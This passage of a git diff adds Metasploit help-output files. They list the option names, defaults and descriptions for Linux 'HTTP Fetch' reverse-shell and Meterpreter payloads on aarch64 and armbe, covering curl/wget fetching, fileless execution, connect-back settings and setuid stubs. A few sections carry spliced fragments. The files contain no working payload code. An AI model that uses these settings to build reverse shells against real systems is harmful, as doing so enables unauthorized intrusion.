+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the 
payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-aarch64-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-aarch64-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..eb78b54 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-aarch64-meterpreter_reverse_tcp.txt 
@@ -0,0 +1,97 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/aarch64/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME IHvjSdBvJzEf no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an AARCH64 payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + 
PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-aarch64-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-aarch64-shell-reverse_tcp.txt new file mode 100644 index 0000000..313717d --- /dev/null 
+++ b/msfvenom/payload_options/cmd-linux-http-aarch64-shell-reverse_tcp.txt 
@@ -0,0 +1,93 @@ + + Name: HTTP Fetch, Linux dup2 Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/http/aarch64/shell/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SHELL /bin/sh yes The shell to execute. + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME CbrLJLwKRPdb no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an AARCH64 payload from an HTTP server. + dup2 socket in x12, then execve. + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependSetresuid 
false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-aarch64-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-aarch64-shell_reverse_tcp.txt new file mode 100644 index 0000000..aa121c0 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-aarch64-shell_reverse_tcp.txt 
@@ -0,0 +1,81 @@ + + Name: HTTP Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/http/aarch64/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SHELL /bin/sh yes The shell to execute. + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME shDguViqh no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an AARCH64 payload from an HTTP server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-armbe-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-http-armbe-meterpreter_reverse_http.txt new file mode 100644 index 0000000..d8498d8 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-armbe-meterpreter_reverse_http.txt 
@@ -0,0 +1,104 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/armbe/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/http/armbe/meterpreter_reverse_http: +========================= + +cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME StuziyPw no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMBE payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.2903.86 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + 
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-armbe-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-http-armbe-meterpreter_reverse_https.txt new file mode 100644 index 0000000..a0cfbfd --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-armbe-meterpreter_reverse_https.txt 
@@ -0,0 +1,106 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/armbe/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/http/armbe/meterpreter_reverse_https: +========================= + +ok@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME XhqxIbdAADBV no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMBE payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A 
string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-armbe-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-armbe-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..cf26ebc --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-armbe-meterpreter_reverse_tcp.txt 
@@ -0,0 +1,97 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/armbe/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME aubpeJLQm no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMBE payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + 